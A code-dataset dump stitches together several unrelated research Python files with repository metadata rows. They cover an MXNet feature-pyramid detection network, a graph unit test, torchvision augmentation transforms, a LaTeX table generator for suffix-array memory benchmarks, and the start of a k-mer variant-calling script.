weight=self.shared_param_dict['rpn_cls_score_weight'], bias=self.shared_param_dict['rpn_cls_score_bias'])
rpn_bbox_pred = mx.sym.Convolution(data=rpn_relu, kernel=(1, 1), pad=(0, 0), num_filter=4 * num_anchors, name='rpn_bbox_pred_' + suffix,
weight=self.shared_param_dict['rpn_bbox_pred_weight'], bias=self.shared_param_dict['rpn_bbox_pred_bias'])
# n x (2*A) x H x W => n x 2 x (A*H*W)
rpn_cls_score_t1 = mx.sym.Reshape(data=rpn_cls_score, shape=(0, 2, -1, 0), name='rpn_cls_score_t1_' + suffix)
rpn_cls_score_t2 = mx.sym.Reshape(data=rpn_cls_score_t1, shape=(0, 2, -1), name='rpn_cls_score_t2_' + suffix)
rpn_cls_prob = mx.sym.SoftmaxActivation(data=rpn_cls_score_t1, mode='channel', name='rpn_cls_prob_' + suffix)
rpn_cls_prob_t = mx.sym.Reshape(data=rpn_cls_prob, shape=(0, 2 * num_anchors, -1, 0), name='rpn_cls_prob_t_' + suffix)
rpn_bbox_pred_t = mx.sym.Reshape(data=rpn_bbox_pred, shape=(0, 0, -1), name='rpn_bbox_pred_t_' + suffix)
return rpn_cls_score_t2, rpn_cls_prob_t, rpn_bbox_pred_t, rpn_bbox_pred
def get_symbol(self, cfg, is_train=True):
# config alias for convenient
num_classes = cfg.dataset.NUM_CLASSES
num_reg_classes = (2 if cfg.CLASS_AGNOSTIC else num_classes)
data = mx.sym.Variable(name="data")
im_info = mx.sym.Variable(name="im_info")
# shared convolutional layers
res0, res1, res2, res3, res4, res5 = self.get_resnet_backbone(data)
#fpn_p0, fpn_p1, fpn_p2, fpn_p3, fpn_p4, fpn_p5, fpn_p6 = self.get_fpn_feature(res0, res1, res2, res3, res4, res5)
fpn_p0,fpn_p6 = self.get_fpn_feature(res0, res1, res2, res3, res4, res5)
#fpn_p0, fpn_p1, fpn_p2, fpn_p3,fpn_p4 = self.get_fpn_feature(res0, res1, res2, res3, res4, res5)
#rpn_cls_score_p0, rpn_prob_p0, rpn_bbox_loss_p0, rpn_bbox_pred_p0 = self.get_rpn_subnet(fpn_p0, cfg.network.NUM_ANCHORS, 'p0')
#rpn_cls_score_p1, rpn_prob_p1, rpn_bbox_loss_p1, rpn_bbox_pred_p1 = self.get_rpn_subnet(fpn_p1, cfg.network.NUM_ANCHORS, 'p1')
#rpn_cls_score_p2, rpn_prob_p2, rpn_bbox_loss_p2, rpn_bbox_pred_p2 = self.get_rpn_subnet(fpn_p2, cfg.network.NUM_ANCHORS, 'p2')
#rpn_cls_score_p3, rpn_prob_p3, rpn_bbox_loss_p3, rpn_bbox_pred_p3 = self.get_rpn_subnet(fpn_p3, cfg.network.NUM_ANCHORS, 'p3')
#rpn_cls_score_p4, rpn_prob_p4, rpn_bbox_loss_p4, rpn_bbox_pred_p4 = self.get_rpn_subnet(fpn_p4, cfg.network.NUM_ANCHORS, 'p4')
#rpn_cls_score_p5, rpn_prob_p5, rpn_bbox_loss_p5, rpn_bbox_pred_p5 = self.get_rpn_subnet(fpn_p5, cfg.network.NUM_ANCHORS, 'p5')
rpn_cls_score_p6, rpn_prob_p6, rpn_bbox_loss_p6, rpn_bbox_pred_p6 = self.get_rpn_subnet(fpn_p6, cfg.network.NUM_ANCHORS, 'p6')
rpn_cls_prob_dict = {
'rpn_cls_prob_stride64': rpn_prob_p6,
#'rpn_cls_prob_stride32': rpn_prob_p5,
#'rpn_cls_prob_stride16': rpn_prob_p4,
#'rpn_cls_prob_stride8': rpn_prob_p3,
#'rpn_cls_prob_stride4': rpn_prob_p2,
#'rpn_cls_prob_stride2': rpn_prob_p1,
#'rpn_cls_prob_stride1': rpn_prob_p0,
}
rpn_bbox_pred_dict = {
'rpn_bbox_pred_stride64': rpn_bbox_pred_p6,
#'rpn_bbox_pred_stride32': rpn_bbox_pred_p5,
#'rpn_bbox_pred_stride16': rpn_bbox_pred_p4,
#'rpn_bbox_pred_stride8': rpn_bbox_pred_p3,
#'rpn_bbox_pred_stride4': rpn_bbox_pred_p2,
#'rpn_bbox_pred_stride2': rpn_bbox_pred_p1,
#'rpn_bbox_pred_stride1': rpn_bbox_pred_p0,
}
arg_dict = dict(rpn_cls_prob_dict.items() + rpn_bbox_pred_dict.items())
if is_train:
rpn_label = mx.sym.Variable(name='label')
rpn_bbox_target = mx.sym.Variable(name='bbox_target')
rpn_bbox_weight = mx.sym.Variable(name='bbox_weight')
gt_boxes = mx.sym.Variable(name="gt_boxes")
#rpn_cls_score = mx.sym.Concat(rpn_cls_score_p0,rpn_cls_score_p1,rpn_cls_score_p2, rpn_cls_score_p3, rpn_cls_score_p4, rpn_cls_score_p5, rpn_cls_score_p6, dim=2)
#rpn_bbox_loss = mx.sym.Concat(rpn_bbox_loss_p0,rpn_bbox_loss_p1,rpn_bbox_loss_p2, rpn_bbox_loss_p3, rpn_bbox_loss_p4, rpn_bbox_loss_p5, rpn_bbox_loss_p6, dim=2)
rpn_cls_score = mx.sym.Concat(rpn_cls_score_p6,dim=2)
rpn_bbox_loss = mx.sym.Concat(rpn_bbox_loss_p6,dim=2)
# RPN classification loss
rpn_cls_output = mx.sym.SoftmaxOutput(data=rpn_cls_score, label=rpn_label, multi_output=True, normalization='valid',
use_ignore=True, ignore_label=-1, name='rpn_cls_prob')
# bounding box regression
rpn_bbox_loss = rpn_bbox_weight * mx.sym.smooth_l1(name='rpn_bbox_loss_l1', scalar=3.0, data=(rpn_bbox_loss - rpn_bbox_target))
rpn_bbox_loss = mx.sym.MakeLoss(name='rpn_bbox_loss', data=rpn_bbox_loss, grad_scale=1.0 / cfg.TRAIN.RPN_BATCH_SIZE)
aux_dict = {
'op_type': 'pyramid_proposal', 'name': 'rois',
'im_info': im_info, 'feat_stride': tuple(cfg.network.RPN_FEAT_STRIDE),
'scales': tuple(cfg.network.ANCHOR_SCALES), 'ratios': tuple(cfg.network.ANCHOR_RATIOS),
'rpn_pre_nms_top_n': cfg.TRAIN.RPN_PRE_NMS_TOP_N, 'rpn_post_nms_top_n': cfg.TRAIN.RPN_POST_NMS_TOP_N,
'threshold': cfg.TRAIN.RPN_NMS_THRESH, 'rpn_min_size': cfg.TRAIN.RPN_MIN_SIZE
}
# ROI proposal
rois = mx.sym.Custom(**dict(arg_dict.items() + aux_dict.items()))
# ROI proposal target
gt_boxes_reshape = mx.sym.Reshape(data=gt_boxes, shape=(-1, 5), name='gt_boxes_reshape')
rois, label, bbox_target, bbox_weight \
= mx.sym.Custom(rois=rois, gt_boxes=gt_boxes_reshape, op_type='proposal_target', num_classes=num_reg_classes, batch_images=cfg.TRAIN.BATCH_IMAGES,
batch_rois=cfg.TRAIN.BATCH_ROIS, cfg=cPickle.dumps(cfg), fg_fraction=cfg.TRAIN.FG_FRACTION)
else:
aux_dict = {
'op_type': 'pyramid_proposal', 'name': 'rois',
'im_info': im_info, 'feat_stride': tuple(cfg.network.RPN_FEAT_STRIDE),
'scales': tuple(cfg.network.ANCHOR_SCALES), 'ratios': tuple(cfg.network.ANCHOR_RATIOS),
'rpn_pre_nms_top_n': cfg.TEST.RPN_PRE_NMS_TOP_N, 'rpn_post_nms_top_n': cfg.TEST.RPN_POST_NMS_TOP_N,
'threshold': cfg.TEST.RPN_NMS_THRESH, 'rpn_min_size': cfg.TEST.RPN_MIN_SIZE
}
# ROI proposal
rois = mx.sym.Custom(**dict(arg_dict.items() + aux_dict.items()))
roi_pool = mx.symbol.Custom(data_p0=fpn_p0,
rois=rois, op_type='fpn_roi_pooling', name='fpn_roi_pooling', feat_strides = '(1)')
# 2 fc
fc_new_1 = mx.symbol.FullyConnected(name='fc_new_1', data=roi_pool, num_hidden=1024)
fc_new_1_relu = mx.sym.Activation(data=fc_new_1, act_type='relu', name='fc_new_1_relu')
fc_new_2 = mx.symbol.FullyConnected(name='fc_new_2', data=fc_new_1_relu, num_hidden=1024)
fc_new_2_relu = mx.sym.Activation(data=fc_new_2, act_type='relu', name='fc_new_2_relu')
# cls_score/bbox_pred
cls_score = mx.symbol.FullyConnected(name='cls_score', data=fc_new_2_relu, num_hidden=num_classes)
bbox_pred = mx.symbol.FullyConnected(name='bbox_pred', data=fc_new_2_relu, num_hidden=num_reg_classes * 4)
if is_train:
if cfg.TRAIN.ENABLE_OHEM:
labels_ohem, bbox_weights_ohem = mx.sym.Custom(op_type='BoxAnnotatorOHEM', num_classes=num_classes,
num_reg_classes=num_reg_classes, roi_per_img=cfg.TRAIN.BATCH_ROIS_OHEM,
cls_score=cls_score, bbox_pred=bbox_pred, labels=label,
bbox_targets=bbox_target, bbox_weights=bbox_weight)
cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=labels_ohem, normalization='valid', use_ignore=True, ignore_label=-1)
bbox_loss_ = bbox_weights_ohem * mx.sym.smooth_l1(name='bbox_loss_', scalar=1.0, data=(bbox_pred - bbox_target))
bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_, grad_scale=1.0 / cfg.TRAIN.BATCH_ROIS_OHEM)
rcnn_label = labels_ohem
elif cfg.TRAIN.ENABLE_FOCAL_LOSS:
cls_prob = mx.sym.Custom(op_type='FocalLoss', name='cls_prob', data=cls_score, labels=label, gamma= 2,alpha = 0.25)
# cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=label, normalization='valid')
bbox_loss_ = bbox_weight * mx.sym.smooth_l1(name='bbox_loss_', scalar=1.0,
data=(bbox_pred - bbox_target))
bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_, grad_scale=1.0 / cfg.TRAIN.BATCH_ROIS)
#bbox_loss = mx.sym.Custom(op_type='FocalLoss', name='cls_prob', data=bbox_pred, labels=bbox_target, gamma= 2,alpha = 0.25)
rcnn_label = label
else:
cls_prob = mx.sym.SoftmaxOutput(name='cls_prob', data=cls_score, label=label, normalization='valid')
bbox_loss_ = bbox_weight * mx.sym.smooth_l1(name='bbox_loss_', scalar=1.0, data=(bbox_pred - bbox_target))
bbox_loss = mx.sym.MakeLoss(name='bbox_loss', data=bbox_loss_, grad_scale=1.0 / cfg.TRAIN.BATCH_ROIS)
rcnn_label = label
# reshape output
rcnn_label = mx.sym.Reshape(data=rcnn_label, shape=(cfg.TRAIN.BATCH_IMAGES, -1), name='label_reshape')
cls_prob = mx.sym.Reshape(data=cls_prob, shape=(cfg.TRAIN.BATCH_IMAGES, -1, num_classes), name='cls_prob_reshape')
bbox_loss = mx.sym.Reshape(data=bbox_loss, shape=(cfg.TRAIN.BATCH_IMAGES, -1, 4 * num_reg_classes), name='bbox_loss_reshape')
# group = mx.sym.Group([rpn_cls_output, rpn_bbox_loss, mx.sym.BlockGrad(cls_prob), mx.sym.BlockGrad(bbox_loss), mx.sym.BlockGrad(rcnn_label)])
group = mx.sym.Group([rpn_cls_output, rpn_bbox_loss, cls_prob, bbox_loss, mx.sym.BlockGrad(rcnn_label)])
else:
cls_prob = mx.sym.SoftmaxActivation(name='cls_prob', data=cls_score)
cls_prob = mx.sym.Reshape(data=cls_prob, shape=(cfg.TEST.BATCH_IMAGES, -1, num_classes), name='cls_prob_reshape')
bbox_pred = mx.sym.Reshape(data=bbox_pred, shape=(cfg.TEST.BATCH_IMAGES, -1, 4 * num_reg_classes), name='bbox_pred_reshape')
group = mx.sym.Group([rois, cls_prob, bbox_pred])
self.sym = group
return group
def init_weight_rcnn(self, cfg, arg_params, aux_params):
arg_params['fc_new_1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fc_new_1_weight'])
arg_params['fc_new_1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fc_new_1_bias'])
arg_params['fc_new_2_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fc_new_2_weight'])
arg_params['fc_new_2_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fc_new_2_bias'])
arg_params['cls_score_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['cls_score_weight'])
arg_params['cls_score_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['cls_score_bias'])
arg_params['bbox_pred_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['bbox_pred_weight'])
arg_params['bbox_pred_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['bbox_pred_bias'])
def init_weight_fpn(self, cfg, arg_params, aux_params):
arg_params['fpn_p6_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p6_weight'])
arg_params['fpn_p6_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p6_bias'])
'''
arg_params['fpn_p5_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p5_weight'])
arg_params['fpn_p5_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p5_bias'])
arg_params['fpn_p4_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p4_weight'])
arg_params['fpn_p4_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p4_bias'])
arg_params['fpn_p3_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p3_weight'])
arg_params['fpn_p3_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p3_bias'])
arg_params['fpn_p2_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p2_weight'])
arg_params['fpn_p2_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p2_bias'])
arg_params['fpn_p1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p1_weight'])
arg_params['fpn_p1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p1_bias'])
'''
arg_params['fpn_p0_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p0_weight'])
arg_params['fpn_p0_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p0_bias'])
arg_params['fpn_p5_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p5_1x1_weight'])
arg_params['fpn_p5_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p5_1x1_bias'])
arg_params['fpn_p4_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p4_1x1_weight'])
arg_params['fpn_p4_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p4_1x1_bias'])
arg_params['fpn_p3_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p3_1x1_weight'])
arg_params['fpn_p3_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p3_1x1_bias'])
arg_params['fpn_p2_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p2_1x1_weight'])
arg_params['fpn_p2_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p2_1x1_bias'])
arg_params['fpn_p1_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p1_1x1_weight'])
arg_params['fpn_p1_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p1_1x1_bias'])
arg_params['fpn_p0_1x1_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p0_1x1_weight'])
arg_params['fpn_p0_1x1_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p0_1x1_bias'])
'''
for i in range(6):
arg_params['bn_fpn_p'+str(i)+'_1x1_gamma'] = mx.nd.ones(shape=self.arg_shape_dict['bn_fpn_p'+str(i)+'_1x1_gamma'])
arg_params['bn_fpn_p'+str(i)+'_1x1_beta'] = mx.nd.zeros(shape=self.arg_shape_dict['bn_fpn_p'+str(i)+'_1x1_beta'])
aux_params['bn_fpn_p'+str(i)+'_1x1_moving_mean'] = mx.nd.zeros(shape=self.aux_shape_dict['bn_fpn_p'+str(i)+'_1x1_moving_mean'])
aux_params['bn_fpn_p'+str(i)+'_1x1_moving_var'] = mx.nd.ones(shape=self.aux_shape_dict['bn_fpn_p'+str(i)+'_1x1_moving_var'])
arg_params['fpn_p5_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p5_deconv_weight'])
#arg_params['fpn_p5_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p5_deconv_bias'])
arg_params['fpn_p4_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p4_deconv_weight'])
#arg_params['fpn_p4_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p4_deconv_bias'])
arg_params['fpn_p3_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p3_deconv_weight'])
#arg_params['fpn_p3_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p3_deconv_bias'])
arg_params['fpn_p2_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p2_deconv_weight'])
#arg_params['fpn_p2_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p2_deconv_bias'])
arg_params['fpn_p1_deconv_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict['fpn_p1_deconv_weight'])
#arg_params['fpn_p1_deconv_bias'] = mx.nd.zeros(shape=self.arg_shape_dict['fpn_p1_deconv_bias'])
'''
def init_weight(self, cfg, arg_params, aux_params):
for name in self.shared_param_list:
arg_params[name + '_weight'] = mx.random.normal(0, 0.01, shape=self.arg_shape_dict[name + '_weight'])
arg_params[name + '_bias'] = mx.nd.zeros(shape=self.arg_shape_dict[name + '_bias'])
self.init_weight_rcnn(cfg, arg_params, aux_params)
self.init_weight_fpn(cfg, arg_params, aux_params)
| [
"qileimail123@gmail.com"
] | qileimail123@gmail.com |
2b8a1f223adcae70c85c50da499d85bbc1247f9b | bf509536050c01245e27c3e04e366b5b5f426315 | /test/test_graph_wu.py | bb8a4c04514d4d6c3f2dbdbeaf0e093c66c89d51 | [] | no_license | syntronicbraph/Braph-2.0-Python | ad419b70661cd89448f3db500c92df63c7556733 | a58fd0c6ce232eb63930de3d1cb3987747aafca4 | refs/heads/master | 2021-01-16T02:03:08.344897 | 2020-02-25T07:09:08 | 2020-02-25T07:09:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,782 | py | import unittest
from braphy.graph_measures import MeasureParser
from braphy.graph import *
import numpy as np
class TestGraphWU(unittest.TestCase):
def test_binary(self):
measure_list = MeasureParser.list_measures()
A = np.array([[0, 1, 1, 0], [1, 0, 0, 0], [1, 0, 0, 0], [0, 0, 0, 0]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
self.assertFalse(graph.is_binary())
def test_directed(self):
measure_list = MeasureParser.list_measures()
A = np.array([[0, 1, 1, 0], [1, 0, 0, 0], [1, 0, 0, 0], [0, 0, 0, 0]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
self.assertFalse(graph.is_directed())
def test_remove_diagonal(self):
measure_list = MeasureParser.list_measures()
A = np.array([[1, 1, 1, 1], [1, 1, 1, 0], [1, 1, 0, 0], [0, 0, 0, 0]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
for (i, j), value in np.ndenumerate(graph.A):
if(i == j):
self.assertEqual(value, 0)
def test_remove_negative_weights(self):
measure_list = MeasureParser.list_measures()
A = np.array([[1, -1, 1, -1], [1, -1, 1, 0], [-1, 1, 0, 0], [0, 0, 0, 0]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
for (i, j), value in np.ndenumerate(graph.A):
self.assertTrue(value >= 0)
def test_symmetrize(self):
measure_list = MeasureParser.list_measures()
A = np.array([[1, 1, 1, 1], [0, 1, 1, 1], [0, 0, 1, 1], [0, 0, 0, 1]])
graph = GraphWU(A, measure_list[GraphWU], 'zero', 'max')
for (i, j), value in np.ndenumerate(graph.A):
if(i != j):
self.assertTrue(value > 0)
if __name__ == '__main__':
unittest.main()
| [
"lisjxa@syntronic.com"
] | lisjxa@syntronic.com |
9938592537dabb5771d1f0da8bdbc1a334c441e1 | ee34ec4a6db48437d598496205330b768859a9b7 | /pytorch-scripts/Augmentation.py | 5bc9453ac332ece31b5a4a34589dea7d28b4d42e | [] | no_license | lochana1/kaggle_ConvNet_tinyImagenet | a75f4ad5cc747c3127310103249ca48bdb8ec5fd | 00574dd8519619dd24c3ebcd5ddf788dabf6c877 | refs/heads/master | 2021-01-24T00:04:39.700504 | 2018-02-27T15:23:09 | 2018-02-27T15:23:09 | 122,753,614 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,262 | py |
from torchvision import transforms
class Augmentation:
def __init__(self,strategy):
print ("Data Augmentation Initialized with strategy %s"%(strategy));
self.strategy = strategy;
def applyTransforms(self):
if self.strategy == "H_FLIP": # horizontal flip with a probability of 0.5
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
elif self.strategy == "H_FLIP_ROTATE": # horizontal flip with a probability of 0.5
data_transforms = {
'train': transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomRotation(5),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
elif self.strategy == "SCALE_H_FLIP": # resize to 224*224 and then do a random horizontal flip.
data_transforms = {
'train': transforms.Compose([
transforms.Resize([224,224]),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
'val': transforms.Compose([
transforms.Resize([224,224]),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
]),
}
else :
print ("Please specify correct augmentation strategy : %s not defined"%(self.strategy));
exit();
return data_transforms;
| [
"lochana@tcd.ie"
] | lochana@tcd.ie |
babd152532ef2d5653ea052353810305b7f6f33d | 5580fa2eac9877d54a5bfa17694e8fb310c10cfb | /suffixArray/buildMemoryTable.py | ab381aa813b42f26d86d630bf895c8595ab35250 | [] | no_license | jlabeit/wavelet-suffix-fm-index | c16b37ccad959e647a9f388b0520c98472f11fca | deaa57e92bbfd1596423f4a66c5f138aff43bdb7 | refs/heads/master | 2021-01-20T10:56:28.140141 | 2017-03-31T10:24:07 | 2017-03-31T10:24:07 | 34,020,459 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 3,326 | py | import csv
sizes = {'abab': 104857600, 'kernel': 257961544, 'dblp.xml.0001.1': 104857600, 'influenza': 154808555, 'dblp.xml.0001.2': 104857600, 'sources.001.2': 104857600, 'proteins.001.1': 104857600, 'sources': 210866603, 'einstein.de.txt': 92758441, 'english.001.2': 104857600, 'dna': 403927746, 'Escherichia_Coli': 112689515, 'world_leaders': 46968181, 'coreutils': 205281760, 'fib41': 267914296, 'english.1024MB': 1073741816, 'dblp.xml': 296135874, 'para': 429265758, 'aabbaabb': 104857600, 'pitches': 55814376, 'dna.001.1': 104857600, 'tm29': 268435456, 'rs.13': 216747218, 'cere': 461286644, 'aaa': 104857600, 'proteins': 1184051855, 'dblp.xml.00001.2': 104857600, 'dblp.xml.00001.1': 104857600}
# Read result data.
def parseRow(row):
return [row[0].strip(), row[1].strip(), int(row[2]), float(row[3]), float(row[4])]
data = []
with open('results', 'rb') as csvfile:
spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')
for row in spamreader:
data.append(parseRow(row))
artificial = ('artificial repetitive', ['fib41', 'rs.13', 'tm29'])
real = ('real repetitive', ['Escherichia_Coli', 'cere', 'coreutils', 'einstein.de.txt',
'influenza', 'kernel', 'para', 'world_leaders'])
pseudo= ('pseudo repetitive', ['dblp.xml.00001.1', 'dblp.xml.00001.2', 'dblp.xml.0001.1',
'dblp.xml.0001.2', 'dna.001.1', 'english.001.2', 'proteins.001.1', 'sources.001.2'])
classic = ('non-repetitive', ['sources', 'pitches', 'proteins', 'dna', 'english.1024MB', 'dblp.xml'])
special = ('special cases', ['aaa', 'abab', 'aabbaabb'])
inputs = [classic, real, artificial, pseudo, special]
#threads = [1, 2, 4, 8, 12, 16, 24, 32, 40, 48, 56, 64]
threads = [1, 8, 16, 32, 64]
salgos = ['divsufsort']
palgos = ['parallelKS', 'parallelRange', 'parallelDivsufsort', 'pScan']
result_file = open('memorySuffix.tex', 'w')
def getMemory(a, b, c):
size = 1.0
for row in data:
if row[0] == a and row[1] == b and row[2] == c:
size = row[3]
return size * 1024 * 1024 / sizes[b];
def write_label(l):
result_file.write('\\multicolumn{2}{l}{\\textit{' + label + '}} \\\\\n')
def getStrMemory(f, algo, smallest):
if (algo in salgos):
return '%.2f '% getMemory(algo, f, 1)
else:
t64 = getMemory(algo, f, 64)
if (smallest):
return '\\textbf{%.2f} &' % t64
return '%.2f & ' % t64
def getSmallest(f):
mini = 100000000.0;
result = ''
for algo in palgos:
cur = getMemory(algo, f, 64)
if mini > cur:
mini = cur
result = algo
return result
def write_result(f):
result_file.write(f.replace('_', '\\_') + ' & ')
smallest = getSmallest(f)
for algo in palgos:
result_file.write(getStrMemory(f, algo, smallest == algo))
for algo in salgos:
result_file.write(getStrMemory(f, algo, smallest == algo))
result_file.write('\\\\\n')
result_file.write('\\begin{tabular}{l | r r r r | r}\n')
result_file.write('Input')
for a in ['KS', 'Range', 'parDss', 'Scan']:
result_file.write(' & {%s}' % a)
result_file.write(' & serDss \\\\\n')
result_file.write('\hline\n')
for (label, files) in inputs:
write_label(label)
for f in files:
write_result(f)
result_file.write('\\bottomrule\n')
result_file.write('\\end{tabular}\n')
| [
"julianlabeit@gmail.com"
] | julianlabeit@gmail.com |
b0eeedff566b8429408cf2f365015b174ba8e781 | 685f1edc5763cdfa63310f43a5ce9c07c8c406fc | /script/variant_call.py | 4062a05513627c74fb677da51e8294b620728cda | [
"MIT"
] | permissive | yunfengwang0317/2-kupl | 3b02f7fb1095cfc0a9cb84d76d663a62c80a2e44 | 0b525a147edaacd2a3aebc8b18f59e0f1882ffaf | refs/heads/master | 2023-05-30T19:47:58.174724 | 2021-06-23T11:35:57 | 2021-06-23T11:35:57 | 300,064,708 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 29,987 | py | import os,sys,time,subprocess,re,gzip,platform
from math import ceil
from tqdm import *
import pandas as pd
import numpy as np
from tempfile import *
import scipy.stats as stats
from Bio import pairwise2
from Bio.pairwise2 import format_alignment
from difflib import SequenceMatcher
from pydna.assembly import Assembly
from pydna.dseqrecord import Dseqrecord
from Bio.Seq import Seq
from collections import defaultdict
from functools import partial
from multiprocessing import Process,Pool,Manager,Value
#from fsplit.filesplit import FileSplit
if platform.system()=='Linux':compress='zcat'
elif platform.system()=='Darwin':compress='gunzip -c'
else:
print ('2kupl runs on either Linux or Macos')
os._exit(0)
def dist(s1,s2,start=0):
if len(s1)!=len(s2):raise ValueError('undefined for sequences of unequal length')
hd=0
for e1,e2 in zip(s1[start:],s2[start:]):
if e1!=e2:hd+=1
if hd>1:return 9
return hd
#return sum(chr1!=chr2 for chr1,chr2 in zip(s1,s2))
def sizeof_fmt(num, suffix='B'):
for unit in ['','Ki','Mi','Gi','Ti','Pi','Ei','Zi']:
if abs(num) < 1024.0:
return "%3.1f %s%s" % (num, unit, suffix)
num /= 1024.0
return "%.1f %s%s" % (num, 'Yi', suffix)
def createindex(lock,fi):
global pair_T,pair_N
idx_head,idx_tail=defaultdict(lambda: defaultdict(list)),defaultdict(lambda: defaultdict(list))
dat=pd.read_csv(fi,header=None,index_col=None,sep=' ')#the 1st line in kmercount table is considered to be the head by kmerFilter
subwildkmers = dict(zip(dat.iloc[:,0],dat.iloc[:,1]))
for p in subwildkmers.keys():
idx_head[p[:15]]['ref'].append(p)
idx_tail[p[-15:]]['ref'].append(p)
for q in spekmer:
idx_head[q[:15]]['mut'].append(q)
idx_tail[q[-15:]]['mut'].append(q)
subpair_T,subpair_N=pairkmers(idx_head,idx_tail)
lock.acquire()
pair_N+=subpair_N
pair_T+=subpair_T
lock.release()
idx_head.clear()
idx_tail.clear()
def pairkmers(idx_head,idx_tail):
subpair_T,subpair_N=[],[]
for key in tqdm(idx_head.keys()):
if idx_head[key]['ref']==[] or idx_head[key]['mut']==[]:continue
for q in idx_head[key]['mut']:
for j in idx_head[key]['ref']:
if q==j:break#second check if kmer is common in both T&N
if dist(q,j,15)==1:
subpair_T.append(q)
subpair_N.append(j)
for key in tqdm(idx_tail.keys()):
if idx_tail[key]['ref']==[] or idx_tail[key]['mut']==[]:continue
for q in idx_tail[key]['mut']:
for j in idx_tail[key]['ref']:
if q==j:break
if dist(q,j,0)==1:
subpair_T.append(q)
subpair_N.append(j)
return (subpair_T,subpair_N)
def contig2kmer(contig,rev=False):
kmerlst=[]
if rev==False:contig=contig
else:contig=str(Seq(contig).reverse_complement())
for i in range(len(contig)-30):
kmerlst.append(contig[i:(i+31)])
return kmerlst
def maxoverlap(s1,s2):
d = SequenceMatcher(None,s1,s2)
pos_a, pos_b, size = d.find_longest_match(0, len(s1), 0, len(s2))
return (pos_a,pos_b,size)
def assemDNA(lst):
res = lst[0]+'N'*100
for tarkmer in lst[1:]:
pos_s,pos_t,size = maxoverlap(res, tarkmer)
if size<10:continue
res=res.replace(res[pos_s:pos_s+31-pos_t],tarkmer)
return (res.strip('N'))
def CAP(contig,reads):
randseed=np.random.randint(1000,1000000)
fa=NamedTemporaryFile(delete=False)
out=open(fa.name,'w')
